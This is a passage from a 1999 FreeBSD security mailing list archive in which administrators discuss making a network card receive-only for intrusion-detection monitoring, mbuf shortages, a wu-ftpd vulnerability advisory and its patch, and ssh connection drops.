if it has an 8392 MAU chip with a Pulse or Valor transformer it will
be pins 7 & 8 of the transformer, don't cut pins 9 & 10, you'll unbalance
the inputs to the MAU and it may oscillate.

Some place I have a nic with 3 dip switches on it ``deaf, dumb, and
belligerent''. Basically the switches open up pins 4,5, 7,8 and
1,2 of the transformer. Real handy for network lab testing...

--
Rod Grimes - KD7CAX - (RWG25)                    rgrimes@gndrsh.dnsmgr.net

From owner-freebsd-security Thu Sep 9 10:55:14 1999
Received: from puck.nether.net (puck.nether.net [204.42.254.5]) by hub.freebsd.org (Postfix) with ESMTP id 8E81F14BE4 for ; Thu, 9 Sep 1999 10:55:06 -0700 (PDT) (envelope-from jared@puck.nether.net)
Received: (from jared@localhost) by puck.nether.net (8.9.3/8.7.3) id NAA14345; Thu, 9 Sep 1999 13:54:22 -0400 (envelope-from jared)
Date: Thu, 9 Sep 1999 13:54:22 -0400
From: Jared Mauch
To: Darren Reed
Cc: Stas Kisel , freebsd-security@FreeBSD.ORG
Subject: Re: mbuf shortage situations
Message-ID: <19990909135422.C11644@puck.nether.net>
Mail-Followup-To: Darren Reed , Stas Kisel , freebsd-security@FreeBSD.ORG
References: <199909090802.MAA16555@sonet.crimea.ua> <199909091015.UAA02113@cheops.anu.edu.au>
X-Mailer: Mutt 1.0pre2i
In-Reply-To: <199909091015.UAA02113@cheops.anu.edu.au>

On Thu, Sep 09, 1999 at 08:15:47PM +1000, Darren Reed wrote:
> In some mail from Stas Kisel, sie said:
> [...]
> > IMHO it is a good idea to develop tcp_drain() from /sys/netinet/tcp_subr.c
> > It should be quite intellectual to select a target - a process or a uid,
> > which does not read properly from its sockets, and has many data in mbufs.
>
> The problem with this is the BSD TCP/IP implementation ACK's (or at least
> attempts to ACK) data as soon as it is received and it is a big no-no to
> discard queued data that has already been ACK'd.

Would it be possible to get it out of mbuf's before it's ack'ed, and
send ack after that? This way you prevent it from having that problem.

Also, I believe it would be suitable to drop udp/icmp stuff from buffers
if there is a problem, as those are designed to handle loss properly, as
tcp isn't. If I miss a dns response, or icmp response, I'm not gonna
cry. But if tcp sessions all start catching resets, that would be a
problem.

	- jared

--
Jared Mauch  | pgp key available via finger from jared@puck.nether.net
clue++;      | http://puck.nether.net/~jared/  My statements are only mine.
END OF LINE  |

From owner-freebsd-security Thu Sep 9 10:59:25 1999
Received: from kerouac.deepwell.com (deepwell.com [209.63.174.12]) by hub.freebsd.org (Postfix) with SMTP id 8792F14BE4 for ; Thu, 9 Sep 1999 10:59:23 -0700 (PDT) (envelope-from freebsd@deepwell.com)
Received: (qmail 522 invoked from network); 9 Sep 1999 18:43:35 -0000
Received: from proxy.dcomm.net (HELO terry) (209.63.175.10) by deepwell.com with SMTP; 9 Sep 1999 18:43:35 -0000
Message-Id: <4.2.0.58.19990909104023.00d0d7e0@mail1.dcomm.net>
X-Sender: freebsd@mail.deepwell.com
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.58
Date: Thu, 09 Sep 1999 10:50:30 -0700
To: "Rodney W. Grimes" , freebsd-security@freebsd.org
From: Deepwell Internet
Subject: Re: Lisen only NIC
In-Reply-To: <199909091742.KAA18619@gndrsh.dnsmgr.net>
References: <199909091721.KAA18571@gndrsh.dnsmgr.net>

There was a thread on Bugtraq about 2 months ago called
"anti-sniffer-sniffer" that went into talking about cutting the Xmit
capabilities from a NIC. I only mention this because this thread is
going the same direction.

Are there certain cards or chipsets that would work well with this idea
of disabling a trace on the NIC itself? It seems as though most NICs
anymore are just a single QFP integrated circuit which does all the
ethernet manipulation as well as any PCI bus interaction. When I see a
NIC anymore it's most often just an Integrated Circuit, an isolation
transformer, and a few surface mount capacitors. These
everything-in-one-chip cards don't seem like they'd be good candidates
for a project like this, but you can't buy anything else in the stores
anymore.

Better yet, is there a good candidate ethernet chipset that interacts
with the ISA bus rather than PCI? This could be incorporated into a
PC-104 accessory card which would work well on a small standalone box
running FreeBSD.

-Terry

> > > No. You'll lose link. Instead, use an external transceiver and cut the
> > > transmit pin on the AUI end of the transceiver. Search the BUGTRAQ
> > > archives for URLs to detailed descriptions of how to do this (and why
> > > cutting the transmit pin on a 10BaseT patch cable won't work)
> >
> > Do any of them talk about drilling the trace between the NIC chip and
> > the MAU chip/isolation? That's where the ``AUI'' cable is now :-)
> >
> > This is often best done on the input side of the isolation transformer
> > so that the input to the MAU chip is still properly balanced.
>
>Strike that last comment, the isolation transformer location depends on
>the type of MAU, it may be on the wrong side and ends up being the
>same thing as cutting the patch cord.
>What was I thinking!! Anyway for 10Base2 this is almost always trivial,
>if it has an 8392 MAU chip with a Pulse or Valor transformer it will
>be pins 7 & 8 of the transformer, don't cut pins 9 & 10, you'll unbalance
>the inputs to the MAU and it may oscillate.
>
>Some place I have a nic with 3 dip switches on it ``deaf, dumb, and
>belligerent''. Basically the switches open up pins 4,5, 7,8 and
>1,2 of the transformer. Real handy for network lab testing...
>
>--
>Rod Grimes - KD7CAX - (RWG25)                    rgrimes@gndrsh.dnsmgr.net

From owner-freebsd-security Thu Sep 9 11:00:20 1999
Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id DFC5D15C8A for ; Thu, 9 Sep 1999 11:00:12 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca)
Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id KAA04701; Thu, 9 Sep 1999 10:59:08 -0700
Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda04699; Thu Sep 9 10:58:57 1999
Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id KAA01232; Thu, 9 Sep 1999 10:58:57 -0700 (PDT)
Message-Id: <199909091758.KAA01232@passer.osg.gov.bc.ca>
Received: from localhost.osg.gov.bc.ca(127.0.0.1), claiming to be "passer.osg.gov.bc.ca" via SMTP by localhost.osg.gov.bc.ca, id smtpdkJ1226; Thu Sep 9 10:58:47 1999
X-Mailer: exmh version 2.0.2 2/24/98
Reply-To: Cy Schubert - ITSD Open Systems Group
From: Cy Schubert - ITSD Open Systems Group
X-OS: FreeBSD 3.2-RELEASE
X-Sender: cy
To: Reinier Bezuidenhout
Cc: avalon@coombs.anu.edu.au (Darren Reed), Goran.Lowkrantz@infologigruppen.se, newton@atdot.dotat.org, freebsd-security@FreeBSD.ORG
Subject: Re: Lisen only NIC
In-reply-to: Your message of "Sat, 09 Sep 1999 16:46:55 +0200." <199909091446.QAA13441@oskar.nanoteq.co.za>
Date: Thu, 09 Sep 1999 10:58:47 -0700

In message <199909091446.QAA13441@oskar.nanoteq.co.za>, Reinier Bezuidenhout writes:
> > Err, this can do bad things like make your hub/switch think your station
> > has dropped off the network and hence get 0 packets.
>
> Yep ... this is true ... we've tried it before and failed :)
>
> The other thing to do is to try and remove the transmit code
> from the card driver :)

why not,

ipfw add 1 deny all ip from any to any out via xl0

Regards,                       Phone:  (250)387-8437
Cy Schubert                      Fax:  (250)387-5766
Open Systems Group          Internet:  Cy.Schubert@uumail.gov.bc.ca
ITSD                                   Cy.Schubert@gems8.gov.bc.ca
Province of BC
            "e**(i*pi)+1=0"

From owner-freebsd-security Thu Sep 9 11:20:42 1999
Received: from agora.neteze.com (agora.neteze.com [208.201.249.4]) by hub.freebsd.org (Postfix) with ESMTP id CA2BB14E1E for ; Thu, 9 Sep 1999 11:20:28 -0700 (PDT) (envelope-from kc@neteze.com)
Received: from admin1 ([208.201.249.51]) by agora.neteze.com (Post.Office MTA v3.5.3 release 223 ID# 0-60395U6000L600S0V35) with SMTP id com for ; Thu, 9 Sep 1999 11:19:18 -0700
Message-ID: <021101befaef$9b220ba0$33f9c9d0@neteze.com>
From: "Kelsey Cummings"
References: <199909091758.KAA01232@passer.osg.gov.bc.ca>
Subject: Re: Lisen only NIC
Date: Thu, 9 Sep 1999 11:17:41 -0700
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2314.1300
X-Mimeole: Produced By Microsoft MimeOLE V5.00.2314.1300

Couldn't you accomplish the same thing with a NIC in promiscuous mode
without an IP address? It would be a whole lot easier.

Kelsey Cummings
kc@microshaft.org

----- Original Message -----
From: Cy Schubert - ITSD Open Systems Group
To: Reinier Bezuidenhout
Cc: Darren Reed ; ; ;
Sent: Thursday, September 09, 1999 10:58 AM
Subject: Re: Lisen only NIC

> In message <199909091446.QAA13441@oskar.nanoteq.co.za>, Reinier
> Bezuidenhout writes:
> > > Err, this can do bad things like make your hub/switch think your station
> > > has dropped off the network and hence get 0 packets.
> >
> > Yep ... this is true ... we've tried it before and failed :)
> >
> > The other thing to do is to try and remove the transmit code
> > from the card driver :)
>
> why not,
>
> ipfw add 1 deny all ip from any to any out via xl0
>
>
> Regards,                       Phone:  (250)387-8437
> Cy Schubert                      Fax:  (250)387-5766
> Open Systems Group          Internet:  Cy.Schubert@uumail.gov.bc.ca
> ITSD                                   Cy.Schubert@gems8.gov.bc.ca
> Province of BC
>             "e**(i*pi)+1=0"

From owner-freebsd-security Thu Sep 9 11:25:13 1999
Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id E177214FD0 for ; Thu, 9 Sep 1999 11:25:00 -0700 (PDT) (envelope-from jwyatt@rwsystems.net)
Received: from bsdie.rwsystems.net([209.197.223.2]) (2625 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Thu, 9 Sep 1999 13:09:40 -0500 (CDT) (Smail-3.2.0.106 1999-Mar-31 #1 built 1999-Aug-7)
Date: Thu, 9 Sep 1999 13:09:40 -0500 (CDT)
From: James Wyatt
To: "Lowkrantz, Goran"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Lisen only NIC

The only *true* way I know of to get a listen-only NIC, is to physically
disconnect the xmit line on the NIC. When I read about this in the
"Repelling the Wily Hacker" internet firewall/security book and tried it
on an old 3Com 3c503, I thought it was sufficient and *really* secure.
(The book is so good I've loaned it out so email for ISBN. Great book!)

After reading the AntiSniff stuff by the L0pht folks, I'm not so sure.
I could send an attack packet to your machine with a forged (or real)
return address. When you look-up the hostname in DNS during capture or
reporting, I could see (sniff DNS server ENet, hack DNS server, etc) the
DNS query and know you saw my packet.

I was also under the impression that you didn't have to ifconfig the
card (causing ARP, reply packets, etc) to get /dev/bpf0 to work, since
it worked at the MAC level. Try not configuring the card in rc.conf and
just attaching to the filter for the card. - Jy@

On Thu, 9 Sep 1999, Lowkrantz, Goran wrote:
> To check on our DMZs I am building a monitor system with a protected
> interface connected to the internal network and a multiport card to monitor
> the consoles of the systems in the DMZs. To check for attacks I have setup
> Snort and have tested with the Vision IDS but I want to hide the network
> interface completely so that it can't be seen or heard or attacked or
> anything. I have looked in the handbook, security how-to and searched
> mailing lists but not found anything about how to do this.
>
> The monitor system is on 3-stable, at the moment 3.3RC.
>
> What I would like to have:
> A NIC listening on a connected network using one of the already used
> addresses without being seen and without disturbing any traffic.
> 1 - Is it possible to configure a NIC this way?
> 2 - If not, I have tried to re-use an IP address from the DMZ, set IPFW to
> allow all in and nothing out, but an arp from the DMZ still shows the IF.
> How do I block this?
> 3 - Am I off track? Is there a better way to do this?

From owner-freebsd-security Thu Sep 9 12:09:56 1999
Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id D5BB7152BD for ; Thu, 9 Sep 1999 12:09:53 -0700 (PDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id NAA50497; Thu, 9 Sep 1999 13:09:43 -0600 (MDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id NAA30695; Thu, 9 Sep 1999 13:09:34 -0600 (MDT)
Message-Id: <199909091909.NAA30695@harmony.village.org>
To: Bill Fink
Subject: Re: FTP Vulnerability
Cc: "'freebsd-security@freebsd.org'"
In-reply-to: Your message of "Thu, 09 Sep 1999 09:03:01 EDT."
	<51D35DCFD7B0D21189440040333985C0013853@exchange1.billfink.com.247.64.63.IN-ADDR.ARPA>
References: <51D35DCFD7B0D21189440040333985C0013853@exchange1.billfink.com.247.64.63.IN-ADDR.ARPA>
Date: Thu, 09 Sep 1999 13:09:34 -0600
From: Warner Losh

In message <51D35DCFD7B0D21189440040333985C0013853@exchange1.billfink.com.247.64.63.IN-ADDR.ARPA> Bill Fink writes:
: I've visited the mirrors for the WUFTP site(s) looking for the versions
: "after August 30" and there's NOTHING newer than MAY.

I guess my wording was unclear. Use the FreeBSD port dated August 30 or
newer. If you don't use the FreeBSD port, then follow the instructions
at the wu-ftpd site on how to get an updated version. The port uses
wu-ftpd 2.5.0 plus at least one patch from the wu-ftpd site to fix the
security related problem.

Warner

From owner-freebsd-security Thu Sep 9 12:12:41 1999
Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 895B614C49 for ; Thu, 9 Sep 1999 12:12:38 -0700 (PDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id NAA50517; Thu, 9 Sep 1999 13:11:48 -0600 (MDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id NAA30736; Thu, 9 Sep 1999 13:11:39 -0600 (MDT)
Message-Id: <199909091911.NAA30736@harmony.village.org>
To: "Rashid N. Achilov"
Subject: Re: FTP Vulnerability
Cc: Ruslan Ermilov , Bill Fink , security@FreeBSD.ORG
In-reply-to: Your message of "Thu, 09 Sep 1999 20:54:08 +0700."
Date: Thu, 09 Sep 1999 13:11:39 -0600
From: Warner Losh

In message "Rashid N. Achilov" writes:
: On Thu, 9 Sep 1999, Ruslan Ermilov wrote:
:
: > > I've visited the mirrors for the WUFTP site(s) looking for the versions
: > > "after August 30" and there's NOTHING newer than MAY.
: > >
: > The versions we are talking about refer to the FreeBSD ports collection.
: > Port of wu-ftpd (/usr/ports/net/wu-ftpd) has been upgraded to apply the
: > following patch:
: >
: > ftp://ftp.wu-ftpd.org/pub/wu-ftpd/quickfixes/apply_to_2.5.0/mapped.path.overrun.patch
:
: On this site mapped.overrun... dated August,24.
: In ports tree in patches subdir newest patch dated April,7 :-)

The port updated its Makefile on or about August 30 to start using the
mapped.path.overrun.patch file.
Warner -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: noconv Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQCVAwUBN9gGaVUuHi5z0oilAQFriwP/YpVRzMxETgfXlqO70EDhQQ1lQz0aOIR5 JphalepZzWAWW5/8PD61K5URzt2YcRwH5HXXQrnEwE8pqOGfH2RndDIV9jKc90NY CXyEX9c2HYt2W207eei/agi/2fC/Q5kITP3k0CiPtw6YaNUWinpY5WNlWwM982Ep VROBnv7mXoE= =xto7 -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 12:19: 6 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 2043B14FC5 for ; Thu, 9 Sep 1999 12:19:03 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id NAA50548; Thu, 9 Sep 1999 13:18:01 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id NAA30788; Thu, 9 Sep 1999 13:17:52 -0600 (MDT) Message-Id: <199909091917.NAA30788@harmony.village.org> To: Ruslan Ermilov Subject: Re: FTP Vulnerability Cc: "Rashid N. Achilov" , Bill Fink , security@FreeBSD.ORG In-reply-to: Your message of "Thu, 09 Sep 1999 17:09:40 +0300." <19990909170940.B51179@relay.ucb.crimea.ua> References: <19990909170940.B51179@relay.ucb.crimea.ua> <19990909162255.A15548@relay.ucb.crimea.ua> Date: Thu, 09 Sep 1999 13:17:52 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- In message <19990909170940.B51179@relay.ucb.crimea.ua> Ruslan Ermilov writes: : Grr... Advisory refers to version of the FreeBSD port after 1999/08/30: Let me also explicitly state that the security officer's policy is to only support the FreeBSD ports tree for "re-issue" advisories. 
This is a recent change and I'm trying to figure out the exact parameters
of the change, so feedback would be helpful. At the moment, if you aren't
using ports for things like wu-ftpd, then you are on your own for doing
research to see what you need to do to your, potentially random, system
to make sure that it is not vulnerable.

I reread the advisory and will be the first to admit that it wasn't the
clearest advisory that I'd written in this area. In the future I'll try
to make sure that I state this explicitly and clearly. Something like

    The wu-ftpd FreeBSD port in /usr/ports/ftp/wu-ftpd has been upgraded
    on August 30, 1999 to incorporate changes recommended by the wu-ftpd
    development team to eliminate a potential vulnerability that would
    allow remote users to gain root. You are strongly urged to upgrade
    /usr/ports/ftp/wu-ftpd to a version newer than that date, rebuild
    and reinstall wu-ftpd to eliminate this weakness on your system.

Warner

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAwUBN9gH31UuHi5z0oilAQF12QP+NpoWbo83qlcfxFUsNJhrrz5iv2Gtl/Xv
485APBYuJOm8o6w4t9MxV16DP04m0DKZHCa9E0SwZHKsnsEqVmOrN1yEmjwRRqpw
6VKVXMt6EpSa4JNi5jK/zwsFn1Bq4TAnc7c4VqkLHb14XUbFQRDIMpQhxeo17UC2
jgD0gHMMs6I=
=vFR9
-----END PGP SIGNATURE-----

From owner-freebsd-security Thu Sep 9 12:23:00 1999
Message-Id: <199909091922.NAA30860@harmony.village.org>
To: James Wyatt
Subject: Re: Lisen only NIC
Cc: "Lowkrantz, Goran", freebsd-security@FreeBSD.ORG
In-reply-to: Your message of "Thu, 09 Sep 1999 13:09:40 CDT."
Date: Thu, 09 Sep 1999 13:22:43 -0600
From: Warner Losh

In message James Wyatt writes:
: The only *true* way I know of to get a listen-only NIC, is to physically
: disconnect the xmit line on the NIC. When I read about this in the
: "Repelling the Wily Hacker" internet firewall/security book and tried it
: on an old 3Com 3c503, I thought it was sufficient and *really* secure.
: (The book is so good I've loaned it out so email for ISBN. Great book!)

I've seen in other discussions that while you could do this with the
AUI based ethernet cards, you can't do this with 10base2 or 10base-t
cards. Thinnet is obvious... But the 10-base-t/100-base-t cards need
the xmit lines to negotiate speed settings with the hub. Can anybody
confirm this?

Warner

From owner-freebsd-security Thu Sep 9 12:32:55 1999
To: imp@village.org
Cc: jwyatt@rwsystems.net, Goran.Lowkrantz@infologigruppen.se, freebsd-security@FreeBSD.ORG
Subject: Re: Lisen only NIC
From: sthaug@nethelp.no
In-Reply-To: Your message of "Thu, 09 Sep 1999 13:22:43 -0600"
References: <199909091922.NAA30860@harmony.village.org>
Date: Thu, 09 Sep 1999 21:32:40 +0200
Message-ID: <13779.936905560@verdi.nethelp.no>

> I've seen in other discussions that while you could do this with the
> AUI based ethernet cards, you can't do this with 10base2 or 10base-t
> cards. Thinnet is obvious... But the 10-base-t/100-base-t cards need
> the xmit lines to negotiate speed settings with the hub. Can anybody
> confirm this?

Not just for the negotiation, but also to keep the link up. There are
link pulses sent at regular intervals. If these are not received, the
link is detected as being down.

It's possible to "cheat" on this with some active electronics. Anzen
makes a "receive only" cable, see

http://www.anzen.com/afj/afj_faq.html#anchor157338

Disclaimer: I have no particular knowledge of the Anzen product, aside
from having seen a discussion about this on the NFR distribution list.

Steinar Haug, Nethelp consulting, sthaug@nethelp.no

From owner-freebsd-security Thu Sep 9 12:44:50 1999
From: "Rodney W. Grimes"
Message-Id: <199909091942.MAA18877@gndrsh.dnsmgr.net>
Subject: Re: Lisen only NIC
In-Reply-To: <199909091922.NAA30860@harmony.village.org> from Warner Losh at "Sep 9, 1999 01:22:43 pm"
To: imp@village.org (Warner Losh)
Date: Thu, 9 Sep 1999 12:42:53 -0700 (PDT)
Cc: jwyatt@rwsystems.net (James Wyatt), Goran.Lowkrantz@infologigruppen.se (Lowkrantz Goran), freebsd-security@FreeBSD.ORG

> In message James Wyatt writes:
> : The only *true* way I know of to get a listen-only NIC, is to physically
> : disconnect the xmit line on the NIC. When I read about this in the
> : "Repelling the Wily Hacker" internet firewall/security book and tried it
> : on an old 3Com 3c503, I thought it was sufficient and *really* secure.
> : (The book is so good I've loaned it out so email for ISBN. Great book!)
>
> I've seen in other discussions that while you could do this with the
> AUI based ethernet cards, you can't do this with 10base2 or 10base-t
> cards. Thinnet is obvious...

Actually 10base2 and 10baseT cards are usually very easy to do, they
still have an AUI interface between the NIC chip and the MAU chip.
You just need to find it on the board and ``clip'' the traces.

> But the 10-base-t/100-base-t cards need
> the xmit lines to negotiate speed settings with the hub. Can anybody
> confirm this?

Dual mode cards, and actually 100BaseT changed the game somewhat. But
thankfully MII came along. MII is a fancier AUI, I don't have a data
book with it in here, but you should be able to achieve the same effect
by cutting the Xmit pair between the NIC and MII chip. It may fail
auto-negotiation, but given that the MII chip is supposed to handle all
that it may just work fine.

Anyone have the datasheet on the SEEQ NQ80220/G MII chip so I can do
some surgery and test things out??

Oohhhhh... and is anyone seeing this from very recent Kingston KNE100TX
cards:

de0: rev 0x41 int a irq 10 on pci0.14.0
de0: 21143 [10-100Mb/s] pass 4.1 (invalid EESPROM checksum)
de0: address 00:c0:f0:4a:07:54
de0: enabling 100baseTX port

The cards work fine... but our customers are asking what is up with
this and I wanted to ask if anyone else is seeing it on any DEC based
cards.

-- 
Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net

From owner-freebsd-security Thu Sep 9 12:57:08 1999
From: "Rodney W. Grimes"
Message-Id: <199909091953.MAA18901@gndrsh.dnsmgr.net>
Subject: Re: Lisen only NIC
In-Reply-To: <13779.936905560@verdi.nethelp.no> from "sthaug@nethelp.no" at "Sep 9, 1999 09:32:40 pm"
To: sthaug@nethelp.no
Date: Thu, 9 Sep 1999 12:53:26 -0700 (PDT)
Cc: imp@village.org, jwyatt@rwsystems.net, Goran.Lowkrantz@infologigruppen.se, freebsd-security@FreeBSD.ORG

> > I've seen in other discussions that while you could do this with the
> > AUI based ethernet cards, you can't do this with 10base2 or 10base-t
> > cards. Thinnet is obvious... But the 10-base-t/100-base-t cards need
> > the xmit lines to negotiate speed settings with the hub. Can anybody
> > confirm this?
>
> Not just for the negotiation, but also to keep the link up. There are
> link pulses sent at regular intervals. If these are not received, the
> link is detected as being down.

Can you confirm for me that the link pulses are actually a function of
the MAU/MII and not the NIC chip. I don't recall seeing anything in any
NIC chip data sheet that talks about these. I don't have any current
MAU/MII data sheets.

>
> It's possible to "cheat" on this with some active electronics. Anzen
> makes a "receive only" cable, see
>
> http://www.anzen.com/afj/afj_faq.html#anchor157338

Back to back MAU's with the XMIT pair left out perhaps???

-- 
Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net

From owner-freebsd-security Thu Sep 9 15:53:49 1999
From: Mark Newton
Message-Id: <199909092251.IAA74937@atdot.dotat.org>
Subject: Re: Lisen only NIC
To: jwyatt@rwsystems.net (James Wyatt)
Date: Fri, 10 Sep 1999 08:21:21 +0930 (CST)
Cc: Goran.Lowkrantz@infologigruppen.se, freebsd-security@FreeBSD.ORG
In-Reply-To: from "James Wyatt" at Sep 9, 99 01:09:40 pm

James Wyatt wrote:

> After reading the AntiSniff stuff by the L0pht folks, I'm not so sure. I
> could send an attack packet to your machine with a forged (or real) return
> address. When you look-up the hostname in DNS during capture or reporting,
> I could see (sniff DNS server ENet, hack DNS server, etc) the DNS query
> and know you saw my packet.

How are you going to do that when I can't transmit any packets?

> I was also under the impression that you didn't have to ifconfig the card
> (causing ARP, reply packets, etc) to get /dev/bpf0 to work, since it
> worked at the MAC level. Try not configuring the card in rc.conf and just
> attaching to the filter for the card. - Jy@

The problem is that some cards will still, under some circumstances,
respond to some broadcast traffic.

Is that non-specific enough for you?
:-)

  - mark

--------------------------------------------------------------------
I tried an internal modem,                    newton@atdot.dotat.org
    but it hurt when I walked.                           Mark Newton
----- Voice: +61-4-1620-2223 ------------- Fax: +61-8-82231777 -----

From owner-freebsd-security Thu Sep 9 16:16:39 1999
Date: Thu, 9 Sep 1999 16:14:33 -0700 (PDT)
From: Liam Slusser
To: Warner Losh
Cc: "Rashid N. Achilov", Ruslan Ermilov, Bill Fink, security@FreeBSD.ORG, support@tiora.net
Subject: Re: FTP Vulnerability
In-Reply-To: <199909091911.NAA30736@harmony.village.org>

Does anybody know if BeroFTPD version 1.1.14 is Vulnerable? I know I need
to update to a newer version one of these days...is this one of these
days? *grin*

liam

System Administrator
Tiora Networks | www.tiora.net <---- tiora's webpage
www.tiora.net/~liam <----- homepage | liam@tiora.net <-- my email address
Lowered turbo powered Honda Civic's are really cool. <---------- my quote

On Thu, 9 Sep 1999, Warner Losh wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
>
> In message "Rashid N. Achilov" writes:
> : On Thu, 9 Sep 1999, Ruslan Ermilov wrote:
> :
> : > > I've visited the mirrors for the WUFTP site(s) looking for the versions
> : > > "after August 30" and there's NOTHING newer than MAY.
> : > >
> : > The versions we are talking about refer to the FreeBSD ports collection.
> : > Port of wu-ftpd (/usr/ports/net/wu-ftpd) has been upgraded to apply the
> : > following patch:
> : >
> : > ftp://ftp.wu-ftpd.org/pub/wu-ftpd/quickfixes/apply_to_2.5.0/mapped.path.overrun.patch
> :
> : On this site mapped.overrun... dated August,24.
> : In ports tree in patches subdir newest patch dated April,7 :-)
>
> The port updated its Makefile on or about August 30 to start using the
> mapped.path.overrun.patch file.
>
> Warner
>
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.3ia
> Charset: noconv
> Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface
>
> iQCVAwUBN9gGaVUuHi5z0oilAQFriwP/YpVRzMxETgfXlqO70EDhQQ1lQz0aOIR5
> JphalepZzWAWW5/8PD61K5URzt2YcRwH5HXXQrnEwE8pqOGfH2RndDIV9jKc90NY
> CXyEX9c2HYt2W207eei/agi/2fC/Q5kITP3k0CiPtw6YaNUWinpY5WNlWwM982Ep
> VROBnv7mXoE=
> =xto7
> -----END PGP SIGNATURE-----

From owner-freebsd-security Thu Sep 9 17:20:05 1999
Message-ID: <37D84EE0.17A731E2@w2xo.pgh.pa.us>
Date: Thu, 09 Sep 1999 20:20:48 -0400
From: "James C. Durham"
To: Nick Hibma
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: ssh disconnects

Nick Hibma wrote:
>
> Best guess: A firewall is expiring your connection. If you have the
> problem that ftp connection go slower and slo-wer and slo-w-e-r after
> the first MegaByte, you probably use the same product as our friends
> around here.
>
> Nick

The connection does not seem to exhibit any "slow down".
It just randomly disconnects.

Thanks,
-- 
Jim Durham

From owner-freebsd-security Thu Sep 9 17:22:52 1999
Message-ID: <37D84F92.5D1745C5@w2xo.pgh.pa.us>
Date: Thu, 09 Sep 1999 20:23:46 -0400
From: "James C. Durham"
To: Josef Karthauser
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: ssh disconnects
References: <199909090021.AAA27391@w2xo.pgh.pa.us> <19990909083505.F58237@florence.pavilion.net>

Josef Karthauser wrote:
>
> On Thu, Sep 09, 1999 at 12:21:04AM +0000, James C. Durham wrote:
> > I have ssh forwarding ports from a machine on the internet to
> > another machine with a private IP here at my house.
> >
> > Everything works fine, except that the connection drops at irregular
>
> I have the same problem, more or less. It occurs when my winbox
> goes into sleep mode - during that time all TCP connections get
> severed at some point, including interactive session - well annoying!

I'm running FreeBSD on both ends. It does not seem to affect other
connections such as telnet.

Thank you for the info.
-- 
Jim Durham

From owner-freebsd-security Thu Sep 9 17:30:17 1999
Message-Id: <4.2.0.58.19990909172429.01ff7340@mail1.dcomm.net>
Date: Thu, 09 Sep 1999 17:27:53 -0700
To: nick.hibma@jrc.it, freebsd-security@freebsd.org
From: Deepwell Internet
Subject: Re: ssh disconnects
In-Reply-To: <37D84EE0.17A731E2@w2xo.pgh.pa.us>

We have a situation where a customer gets these FTP slowdowns. He is on
Pac Bell DSL but has a co-location with us. Every time he starts a large
FTP transfer it goes at full speed but slowly degrades. His colocation is
running FreeBSD 3.2 and his office computer is Windows 98 with CuteFTP.

Has anyone else seen this?

At 08:20 PM 9/9/99 -0400, you wrote:
>Nick Hibma wrote:
> >
> > Best guess: A firewall is expiring your connection. If you have the
> > problem that ftp connection go slower and slo-wer and slo-w-e-r after
> > the first MegaByte, you probably use the same product as our friends
> > around here.
> >
> > Nick
>
>The connection does not seem to exhibit any "slow down".
>It just randomly disconnects.
>
>Thanks,
>--
>Jim Durham

From owner-freebsd-security Thu Sep 9 19:30:26 1999
Message-ID: <011f01befb35$669b12f0$fd01a8c0@pacbell.net>
From: "John Howie"
To: , , "Deepwell Internet"
References: <4.2.0.58.19990909172429.01ff7340@mail1.dcomm.net>
Subject: Re: ssh disconnects
Date: Thu, 9 Sep 1999 19:37:18 -0700

There are problems with Windows 95/98/NT protocol stacks that can cause
this. Check out TechNet at http://www.microsoft.com/technet I can't remember
the KB Article, sorry...

john...

----- Original Message -----
From: Deepwell Internet
To: ;
Sent: Thursday, September 09, 1999 5:27 PM
